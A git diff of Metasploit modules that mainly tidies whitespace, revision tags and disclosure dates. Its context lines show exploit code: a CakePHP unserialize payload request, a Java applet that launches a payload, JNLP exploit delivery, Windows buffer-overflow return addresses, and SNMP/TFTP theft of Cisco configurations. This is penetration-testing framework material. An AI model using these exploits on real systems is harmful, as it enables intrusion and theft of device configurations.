diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb
index 1b9460e424..9bc23d5c9e 100644
--- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb
+++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb
@@ -24,8 +24,8 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'Description' => %q{
This module will download the startup or running configuration
- from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
- community is required. The SNMP community scanner module can
+ from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
+ community is required. The SNMP community scanner module can
assist in identifying a read-write community. The target must
be able to connect back to the Metasploit system and the use of
NAT will cause the TFTP transfer to fail.
@@ -54,12 +54,12 @@ class Metasploit3 < Msf::Auxiliary
@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
@tftp.start
add_socket(@tftp.sock)
-
+
@main_thread = ::Thread.current
-
+
print_status("Scanning for vulnerable targets...")
end
-
+
#
# Kill the TFTP server
#
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
# Wait 5 seconds for background transfers to complete
print_status("Providing some time for transfers to complete...")
::IO.select(nil, nil, nil, 5.0)
-
+
print_status("Shutting down the TFTP service...")
if @tftp
@tftp.close rescue nil
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
-
+
#
# Callback for incoming files
#
@@ -87,14 +87,14 @@ class Metasploit3 < Msf::Auxiliary
data = info[:file][:data]
from = info[:from]
return if not (name and data)
-
+
# Trim off IPv6 mapped IPv4 if necessary
from = from[0].dup
from.gsub!('::ffff:', '')
-
+
print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
-
- # Save the configuration file if a path is specified
+
+ # Save the configuration file if a path is specified
if datastore['OUTPUTDIR']
name = "#{from}.txt"
::FileUtils.mkdir_p(datastore['OUTPUTDIR'])
@@ -104,13 +104,13 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("Saved configuration file to #{path}")
end
-
+
# Toss the configuration file to the parser
cisco_ios_config_eater(from, 161, data)
end
-
+
def run_host(ip)
-
+
begin
source = datastore['SOURCE'].to_i
protocol = 1
@@ -127,11 +127,11 @@ class Metasploit3 < Msf::Auxiliary
session = rand(255) + 1
snmp = connect_snmp
-
+
varbind = SNMP::VarBind.new("#{ccconfigcopyprotocol}#{session}" , SNMP::Integer.new(protocol))
value = snmp.set(varbind)
-
+
# If the above line didn't throw an error, the host is alive and the community is valid
print_status("Trying to acquire configuration from #{ip}...")
@@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary
value = snmp.set(varbind)
disconnect_snmp
-
+
# No need to make noise about timeouts
rescue ::SNMP::RequestTimeout, ::Rex::ConnectionRefused
rescue ::Interrupt
diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb
index 248d9d7bff..3b2337e73a 100644
--- a/modules/auxiliary/scanner/snmp/snmp_enum.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb
@@ -44,36 +44,36 @@ class Metasploit3 < Msf::Auxiliary
#
#
#
-
+
sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
if (sysName.to_s.empty? or sysName.to_s =~ /Null/)
sysName = '-'
end
-
+
sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
if (sysDesc.to_s.empty? or sysDesc.to_s =~ /Null/)
sysDesc = '-'
end
sysDesc.gsub!(/^\s+|\s+$|\n+|\r+/, ' ')
-
+
sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s
if (sysContact.to_s.empty? or sysContact.to_s =~ /Null/)
sysContact = '-'
end
-
+
sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s
if (sysLocation.to_s.empty? or sysLocation.to_s =~ /Null/)
sysLocation = '-'
end
-
+
sysUpTimeInstance = snmp.get_value('1.3.6.1.2.1.1.3.0')
-
+
hrSystemUptime = snmp.get_value('1.3.6.1.2.1.25.1.1.0')
hrSystemUptime = '-' if hrSystemUptime.to_s =~ /Null/
year = month = day = hour = minutes = seconds = tenths = 0
-
+
systemDate = snmp.get_value('1.3.6.1.2.1.25.1.2.0')
if (systemDate.to_s.empty? or systemDate.to_s =~ /Null/)
systemDate = '-'
@@ -109,9 +109,9 @@ class Metasploit3 < Msf::Auxiliary
print_line("Location : #{sysLocation}")
print_line("Uptime snmp : #{sysUpTimeInstance}")
print_line("Uptime system : #{hrSystemUptime}")
-
+
print_line(sprintf("System date : %d-%d-%d %02d:%02d:%02d.%d", year, month, day, hour, minutes, seconds, tenths))
-
+
if sysName.length > 0
report_note(
:host => ip,
@@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
:data => sysName.strip
)
end
-
+
if sysDesc.length > 0
report_note(
:host => ip,
@@ -131,30 +131,30 @@ class Metasploit3 < Msf::Auxiliary
:data => sysDesc.strip
)
end
-
+
if (sysDesc =~ /Windows/)
-
+
domPrimaryDomain = snmp.get_value('1.3.6.1.4.1.77.1.4.1.0')
domPrimaryDomain = '-' if domPrimaryDomain.to_s =~ /Null/
print_line("Domain : #{domPrimaryDomain}")
-
+
#
#
#
-
+
users = []
snmp.walk(["1.3.6.1.4.1.77.1.2.25.1.1","1.3.6.1.4.1.77.1.2.25.1"]) do |user,entry|
users.push([[user.value]])
end
-
+
if not users.empty?
print_line('')
print_status("User accounts\n")
users.each {|a| print_line("#{a}")}
end
end
-
+
#
#
#
@@ -162,57 +162,57 @@ class Metasploit3 < Msf::Auxiliary
network_information = []
ipForwarding = snmp.get_value('1.3.6.1.2.1.4.1.0')
-
- if ipForwarding == 0 || ipForwarding == 2
+
+ if ipForwarding == 0 || ipForwarding == 2
ipForwarding = "no"
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
elsif ipForwarding == 1
ipForwarding = "yes"
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
end
-
+
ipDefaultTTL = snmp.get_value('1.3.6.1.2.1.4.2.0')
if ipDefaultTTL.to_s !~ /Null/
network_information.push([["Default TTL : "],[ipDefaultTTL]])
end
-
+
tcpInSegs = snmp.get_value('1.3.6.1.2.1.6.10.0')
if tcpInSegs.to_s !~ /Null/
network_information.push([["TCP segments received : "],[tcpInSegs]])
end
-
+
tcpOutSegs = snmp.get_value('1.3.6.1.2.1.6.11.0')
if tcpOutSegs.to_s !~ /Null/
network_information.push([["TCP segments sent : "],[tcpOutSegs]])
end
-
+
tcpRetransSegs = snmp.get_value('1.3.6.1.2.1.6.12.0')
if tcpRetransSegs.to_s !~ /Null/
network_information.push([["TCP segments retrans. : "],[tcpRetransSegs]])
end
-
+
ipInReceives = snmp.get_value('1.3.6.1.2.1.4.3.0')
if ipInReceives.to_s !~ /Null/
network_information.push([["Input datagrams : "],[ipInReceives]])
end
-
+
ipInDelivers = snmp.get_value('1.3.6.1.2.1.4.9.0')
if ipInDelivers.to_s !~ /Null/
network_information.push([["Delivered datagrams : "],[ipInDelivers]])
end
-
+
ipOutRequests = snmp.get_value('1.3.6.1.2.1.4.10.0')
if ipOutRequests.to_s !~ /Null/
network_information.push([["Output datagrams : "],[ipOutRequests]])
end
-
+
if not network_information.empty?
print_line('')
print_status("Network information")
print_line('')
network_information.each {|a,b| print_line("#{a} #{b}")}
end
-
+
#
#
#
@@ -220,7 +220,7 @@ class Metasploit3 < Msf::Auxiliary
network_interfaces = []
snmp.walk( ["1.3.6.1.2.1.2.2.1.1", "1.3.6.1.2.1.2.2.1.2", "1.3.6.1.2.1.2.2.1.6", "1.3.6.1.2.1.2.2.1.3", "1.3.6.1.2.1.2.2.1.4", "1.3.6.1.2.1.2.2.1.5", "1.3.6.1.2.1.2.2.1.10", "1.3.6.1.2.1.2.2.1.16", "1.3.6.1.2.1.2.2.1.7"]) do |index,descr,mac,type,mtu,speed,inoc,outoc,status|
-
+
ifindex = index.value
ifdescr = descr.value
ifmac = mac.value.unpack("H2H2H2H2H2H2").join(":")
@@ -230,11 +230,11 @@ class Metasploit3 < Msf::Auxiliary
ifinoc = inoc.value
ifoutoc = outoc.value
ifstatus = status.value
-
+
case iftype
when 1
iftype = "other"
- when 2
+ when 2
iftype = "regular1822"
when 3
iftype = "hdh1822"
@@ -315,7 +315,7 @@ class Metasploit3 < Msf::Auxiliary
network_interfaces.push([[ifstatus],[ifdescr],[ifindex],[ifmac],[iftype],[ifspeed],[ifmtu],[ifinoc],[ifoutoc]])
end
-
+
if not network_interfaces.empty?
print_line('')
print_status("Network interfaces")
@@ -333,7 +333,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
}
end
-
+
#
#
#
@@ -343,7 +343,7 @@ class Metasploit3 < Msf::Auxiliary
snmp.walk(["1.3.6.1.2.1.4.20.1.2","1.3.6.1.2.1.4.20.1.1","1.3.6.1.2.1.4.20.1.3","1.3.6.1.2.1.4.20.1.4"]) do |ifid,ipaddr,netmask,bcast|
network_ip.push([[ifid.value],[ipaddr.value],[netmask.value],[bcast.value]])
end
-
+
if not network_ip.empty?
print_line('')
print_status("Network IP")
@@ -352,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
network_ip.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
end
-
+
#
#
#
@@ -365,7 +365,7 @@ class Metasploit3 < Msf::Auxiliary
end
routing.push([[dest.value],[hop.value],[mask.value],[metric.value]])
end
-
+
if not routing.empty?
print_line('')
print_status("Routing information")
@@ -374,7 +374,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
routing.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
end
-
+
#
#
#
@@ -382,7 +382,7 @@ class Metasploit3 < Msf::Auxiliary
tcp = []
snmp.walk(["1.3.6.1.2.1.6.13.1.2","1.3.6.1.2.1.6.13.1.3","1.3.6.1.2.1.6.13.1.4","1.3.6.1.2.1.6.13.1.5","1.3.6.1.2.1.6.13.1.1"]) do |ladd,lport,radd,rport,state|
-
+
if (ladd.value.to_s.empty? or ladd.value.to_s =~ /noSuchInstance/)
ladd = "-"
else
@@ -406,7 +406,7 @@ class Metasploit3 < Msf::Auxiliary
else
rport = rport.value
end
-
+
case state.value
when 1
state = "closed"
@@ -438,7 +438,7 @@ class Metasploit3 < Msf::Auxiliary
tcp.push([[ladd],[lport],[radd],[rport],[state]])
end
-
+
if not tcp.empty?
print_line('')
print_status("TCP connections and listening ports")
@@ -447,7 +447,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
tcp.each {|a,b,c,d,e| print_line(sprintf("%16s %16s %16s %16s %16s",a,b,c,d,e))}
end
-
+
#
#
#
@@ -457,8 +457,8 @@ class Metasploit3 < Msf::Auxiliary
snmp.walk(["1.3.6.1.2.1.7.5.1.1","1.3.6.1.2.1.7.5.1.2"]) do |ladd,lport|
udp.push([[ladd.value],[lport.value]])
end
-
- if not udp.empty?
+
+ if not udp.empty?
print_line('')
print_status("Listening UDP ports")
print_line('')
@@ -466,13 +466,13 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
udp.each {|a,b| print_line(sprintf("%16s %16s",a,b))}
end
-
+
#
#
#
-
+
if (sysDesc =~ /Windows/)
-
+
#
#
#
@@ -480,13 +480,13 @@ class Metasploit3 < Msf::Auxiliary
network_services = []
n = 0
-
+
snmp.walk(["1.3.6.1.4.1.77.1.2.3.1.1","1.3.6.1.4.1.77.1.2.3.1.2"]) do |name,installed|
network_services.push([[n],[name.value]])
n+=1
end
-
- if not network_services.empty?
+
+ if not network_services.empty?
print_line('')
print_status("Network services")
print_line('')
@@ -494,29 +494,29 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
network_services.each {|a,b| print_line(sprintf("%10s %s",a,b))}
end
-
+
#
#
#
-
+
share = []
snmp.walk(["1.3.6.1.4.1.77.1.2.27.1.1","1.3.6.1.4.1.77.1.2.27.1.2","1.3.6.1.4.1.77.1.2.27.1.3"]) do |name,path,comment|
share.push([[name.value],[path.value],[comment.value]])
end
-
- if not share.empty?
+
+ if not share.empty?
print_line('')
print_status("Share")
print_line('')
share.each {|a,b,c|
- print_line("Name : #{a}")
+ print_line("Name : #{a}")
print_line("Path : #{b}")
print_line("Comment : #{c}")
print_line('')
}
end
-
+
#
#
#
@@ -527,17 +527,17 @@ class Metasploit3 < Msf::Auxiliary
if http_totalBytesSentLowWord.to_s !~ /Null/
iis.push([["TotalBytesSentLowWord : "],[http_totalBytesSentLowWord]])
end
-
+
http_totalBytesReceivedLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.4.0')
if http_totalBytesReceivedLowWord.to_s !~ /Null/
iis.push([["TotalBytesReceivedLowWord : "],[http_totalBytesReceivedLowWord]])
end
-
+
http_totalFilesSent = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.5.0')
if http_totalFilesSent.to_s !~ /Null/
iis.push([["TotalFilesSent : "],[http_totalFilesSent]])
end
-
+
http_currentAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.6.0')
if http_currentAnonymousUsers.to_s !~ /Null/
iis.push([["CurrentAnonymousUsers : "],[http_currentAnonymousUsers]])
@@ -577,7 +577,7 @@ class Metasploit3 < Msf::Auxiliary
if http_maxConnections.to_s !~ /Null/
iis.push([["MaxConnections : "],[http_maxConnections]])
end
-
+
http_connectionAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.14.0')
if http_connectionAttempts.to_s !~ /Null/
iis.push([["ConnectionAttempts : "],[http_connectionAttempts]])
@@ -607,34 +607,34 @@ class Metasploit3 < Msf::Auxiliary
if http_totalOthers.to_s !~ /Null/
iis.push([["Others : "],[http_totalOthers]])
end
-
+
http_totalCGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.20.0')
if http_totalCGIRequests.to_s !~ /Null/
iis.push([["CGIRequests : "],[http_totalCGIRequests]])
end
-
+
http_totalBGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.21.0')
if http_totalBGIRequests.to_s !~ /Null/
iis.push([["BGIRequests : "],[http_totalBGIRequests]])
end
-
+
http_totalNotFoundErrors = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.22.0')
if http_totalNotFoundErrors.to_s !~ /Null/
iis.push([["NotFoundErrors : "],[http_totalNotFoundErrors]])
end
-
- if not iis.empty?
+
+ if not iis.empty?
print_line('')
print_status("IIS server information")
print_line('')
iis.each {|a,b| print_line("#{a} #{b}")}
end
end
-
+
#
#
#
-
+
storage_information = []
snmp.walk(["1.3.6.1.2.1.25.2.3.1.1","1.3.6.1.2.1.25.2.3.1.2","1.3.6.1.2.1.25.2.3.1.3","1.3.6.1.2.1.25.2.3.1.4","1.3.6.1.2.1.25.2.3.1.5","1.3.6.1.2.1.25.2.3.1.6"]) do |index,type,descr,allocation,size,used|
@@ -670,16 +670,16 @@ class Metasploit3 < Msf::Auxiliary
storage_information.push([[descr.value],[index.value],[type.value],[allocation.value],[size.value],[used.value]])
end
-
- if not storage_information.empty?
+
+ if not storage_information.empty?
print_line('')
print_status("Storage information")
print_line('')
storage_information.each {|a,b,c,d,e,f|
-
+
e = number_to_human_size(e,d)
f = number_to_human_size(f,d)
-
+
print_line("#{a}")
print_line("\tDevice id : #{b}")
print_line("\tFilesystem type : #{c}")
@@ -689,23 +689,23 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
}
end
-
+
#
#
#
-
+
file_system = []
hrFSIndex = snmp.get_value('1.3.6.1.2.1.25.3.8.1.1.1')
if hrFSIndex.to_s !~ /Null/
file_system.push([["Index : "],[hrFSIndex]])
end
-
+
hrFSMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.2.1')
if hrFSMountPoint.to_s !~ /Null/
file_system.push([["Mount point : "],[hrFSMountPoint]])
end
-
+
hrFSRemoteMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.3.1')
if hrFSRemoteMountPoint.to_s !~ /Null/
if hrFSRemoteMountPoint.empty?
@@ -713,7 +713,7 @@ class Metasploit3 < Msf::Auxiliary
end
file_system.push([["Remote mount point : "],[hrFSRemoteMountPoint]])
end
-
+
hrFSType = snmp.get_value('1.3.6.1.2.1.25.3.8.1.4.1')
case hrFSType.to_s
@@ -766,7 +766,7 @@ class Metasploit3 < Msf::Auxiliary
else
hrFSType = "Null"
end
-
+
if hrFSType.to_s !~ /Null/
file_system.push([["Type : "],[hrFSType]])
end
@@ -775,12 +775,12 @@ class Metasploit3 < Msf::Auxiliary
if hrFSAccess.to_s !~ /Null/
file_system.push([["Access : "],[hrFSAccess]])
end
-
+
hrFSBootable = snmp.get_value('1.3.6.1.2.1.25.3.8.1.6.1')
if hrFSBootable.to_s !~ /Null/
file_system.push([["Bootable : "],[hrFSBootable]])
end
-
+
if not file_system.empty?
print_line('')
print_status("File system information")
@@ -795,7 +795,7 @@ class Metasploit3 < Msf::Auxiliary
device_information = []
snmp.walk(["1.3.6.1.2.1.25.3.2.1.1","1.3.6.1.2.1.25.3.2.1.2","1.3.6.1.2.1.25.3.2.1.5","1.3.6.1.2.1.25.3.2.1.3"]) do |index,type,status,descr|
-
+
case type.value.to_s
when /^1.3.6.1.2.1.25.3.1.1$/
type.value = "Other"
@@ -836,7 +836,7 @@ class Metasploit3 < Msf::Auxiliary
else
type.value = "unknown"
end
-
+
case status.value
when 1
status.value = "unknown"
@@ -856,8 +856,8 @@ class Metasploit3 < Msf::Auxiliary
device_information.push([[index.value],[type.value],[status.value],[descr.value]])
end
-
- if not device_information.empty?
+
+ if not device_information.empty?
print_line('')
print_status("Device information")
print_line('')
@@ -876,7 +876,7 @@ class Metasploit3 < Msf::Auxiliary
software_list.push([[index.value],[name.value]])
end
- if not software_list.empty?
+ if not software_list.empty?
print_line('')
print_status("Software components")
print_line('')
@@ -900,11 +900,11 @@ class Metasploit3 < Msf::Auxiliary
else
status.value = "unknown"
end
-
+
process_interfaces.push([[id.value],[status.value],[name.value],[path.value],[param.value]])
end
-
- if not process_interfaces.empty?
+
+ if not process_interfaces.empty?
print_line('')
print_status("Process interfaces")
print_line('')
@@ -912,7 +912,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
process_interfaces.each {|a,b,c,d,e| print_line(sprintf("%10s %10s %22s %30s %s",a,b,c,d,e))}
end
-
+
#
#
#
@@ -935,7 +935,7 @@ class Metasploit3 < Msf::Auxiliary
end
def number_to_human_size(size,unit)
- size = size.first.to_i * unit.first.to_i
+ size = size.first.to_i * unit.first.to_i
if size < 1024
"#{size} bytes"
diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb
index a6b51ec4d6..347615a2e4 100644
--- a/modules/auxiliary/scanner/snmp/snmp_set.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_set.rb
@@ -1,5 +1,5 @@
##
-# $Id: $
+# $Id$
##
##
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'SNMP Set Module',
- 'Version' => '$Revision: $',
+ 'Version' => '$Revision$',
'Description' => %q{
This module, similar to snmpset tool, uses the SNMP SET request
to set information on a network entity. A OID (numeric notation)
diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb
index f44fcdc2df..69dadffb4b 100644
--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_error
@use_static = true
- else
+ else
cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
@@ -241,20 +241,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def applet_code
- applet = %Q|
+ applet = <<-EOS
import java.applet.*;
import metasploit.*;
public class #{datastore["APPLETNAME"]} extends Applet {
- public void init() {
- try {
- Payload.main(null);
- } catch (Exception ex) {
- //ex.printStackTrace();
- }
- }
+ public void init() {
+ try {
+ Payload.main(null);
+ } catch (Exception ex) {
+ //ex.printStackTrace();
+ }
+ }
}
- |
+EOS
end
end
diff --git a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb
index 26812aeac8..d9081e5a0b 100644
--- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb
+++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb
@@ -22,12 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
CakePHP is a popular PHP framework for building web applications.
The Security component of CakePHP is vulnerable to an unserialize attack which
- could be abused to allow unauthenticated attackers to execute arbitrary
+ could be abused to allow unauthenticated attackers to execute arbitrary
code with the permissions of the webserver.
},
'Author' =>
[
- 'tdz',
+ 'tdz',
'Felix Wilhelm', # poc
],
'License' => MSF_LICENSE,
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
p << 's:3:"Foo";s:'
p << len.to_s()
p << ':" '
- p << payload.encoded
+ p << payload.encoded
p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'
#rot13 and urlencode
@@ -107,13 +107,13 @@ class Metasploit3 < Msf::Exploit::Remote
{
'uri' => datastore['URI'],
'method' => "POST",
- 'ctype' => 'application/x-www-form-urlencoded',
+ 'ctype' => 'application/x-www-form-urlencoded',
'data' => data
}, 5)
print_status("Sending exploit request 2")
res = send_request_cgi(
- {
+ {
'uri' => datastore['URI'],
'method' => "POST",
'ctype' => 'application/x-www-form-urlencoded',
diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb
index 2410e7c358..93183b216e 100644
--- a/modules/exploits/unix/webapp/mitel_awc_exec.rb
+++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb
@@ -21,17 +21,17 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Mitel Audio and Web Conferencing Command Injection',
'Description' => %q{
This module exploits a command injection flaw within the Mitel
- Audio and Web Conferencing web interface.
+ Audio and Web Conferencing web interface.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
-
+
['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'],
['OSVDB', '69934'],
- # ['CVE', ''],
+ # ['CVE', ''],
# ['BID', '']
],
'Platform' => ['unix', 'linux'],
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("Attempting to execute our command..")
-
+
res = send_request_cgi(
{
'uri' => datastore['URIPATH'],
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")
return
end
-
+
handler
end
diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb
old mode 100755
new mode 100644
diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb
index 5990fa1bfb..8c6b8da49f 100644
--- a/modules/exploits/unix/webapp/trixbox_langchoice.rb
+++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb
@@ -1,5 +1,5 @@
##
-# $Id: $
+# $Id$
##
##
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => ['chao-mu'],
'License' => BSD_LICENSE,
+ 'Version' => '$Revision$',
'References' =>
[
['OSVDB' => '50421'],
diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb
index 13b1de7431..455d4ab105 100644
--- a/modules/exploits/windows/browser/java_basicservice_impl.rb
+++ b/modules/exploits/windows/browser/java_basicservice_impl.rb
@@ -1,5 +1,5 @@
##
-# $Id: java_basicservice_impl.rb 10488 2010-09-26 23:55:03Z egypt $
+# $Id$
##
##
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Matthias Kaiser', # Discovery, PoC, metasploit module
'egypt' # metasploit module
],
- 'Version' => '$Revision: 10488 $',
+ 'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-3563' ],
@@ -87,24 +87,26 @@ class Metasploit3 < Msf::Exploit::Remote
send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })
when /init.jnlp/
- init = %Q|
+ init = <<-EOS
+
- #{jnlp_info}
-
- #{jpath}
-
+#{jnlp_info}
+
+ #{jpath}
+
-|
+EOS
print_status("Sending init.jnlp")
send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })
when /exploit.jnlp/
- expl = %Q|
-
- #{jnlp_info}
-
-
-|
+ expl = <<-EOS
+
+
+#{jnlp_info}
+
+
+EOS
print_status("Sending exploit.jnlp")
send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })
@@ -129,15 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
end
def jnlp_info
-%Q|
- #{Rex::Text.rand_text_alpha(rand(10)+10)}
- #{Rex::Text.rand_text_alpha(rand(10)+10)}
- #{Rex::Text.rand_text_alpha(rand(10)+10)}
-
-
-
-
-
-|
+ buf <<-EOS
+
+ #{Rex::Text.rand_text_alpha(rand(10)+10)}
+ #{Rex::Text.rand_text_alpha(rand(10)+10)}
+ #{Rex::Text.rand_text_alpha(rand(10)+10)}
+
+
+
+
+
+EOS
end
end
diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb
index 9c5e8dd6ae..9bdf82189f 100644
--- a/modules/exploits/windows/browser/wmi_admintools.rb
+++ b/modules/exploits/windows/browser/wmi_admintools.rb
@@ -38,9 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
opt-in to ASLR. As such, this module should be reliable on all Windows
versions.
-
+
The WMI Adminsitrative Tools are a standalone download & install (linked in the
- references).
+ references).
},
'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb
index 07357690f5..6ac1886eb2 100644
--- a/modules/exploits/windows/fileformat/mediajukebox.rb
+++ b/modules/exploits/windows/fileformat/mediajukebox.rb
@@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
],
'Privileged' => false,
+ 'DisclosureDate' => 'July 1 2009',
'DefaultTarget' => 0))
register_options(
diff --git a/modules/exploits/windows/fileformat/mini_stream.rb b/modules/exploits/windows/fileformat/mini_stream.rb
index d95cdc0b7a..baae0a16e7 100644
--- a/modules/exploits/windows/fileformat/mini_stream.rb
+++ b/modules/exploits/windows/fileformat/mini_stream.rb
@@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
],
'Privileged' => false,
+ 'DisclosureDate' => 'Dec 25 2009',
'DefaultTarget' => 0))
register_options(
diff --git a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
index 3837897e3c..6d37b28bb2 100644
--- a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
+++ b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
@@ -23,12 +23,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
- of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
+ of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087 bulletin are vulnerable.
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
- The Microsoft Word RTF parser was only used by default in versions of Microsoft
+ The Microsoft Word RTF parser was only used by default in versions of Microsoft
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
began using the Word RTF parser, by default, to handle rich-text messages within
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
@@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Stick fake SEH frames here and there ;)
if target.name == "Automatic"
targets.each { |t|
- next if t.name !~ /Windows/i
+ next if t.name !~ /Windows/i
add_target(rest, t)
}
@@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
content << "}"
print_status("Creating '#{datastore['FILENAME']}' file ...")
- file_create(content)
+ file_create(content)
end
diff --git a/modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb
index 3d2089b0f1..e11920ba5f 100644
--- a/modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb
+++ b/modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb
@@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote
if target.name == "Automatic"
targets.each { |t|
- next if t.name !~ /Windows/i
+ next if t.name !~ /Windows/i
add_target(data, t)
}
diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb
index c4f986e59b..3d702f9705 100644
--- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb
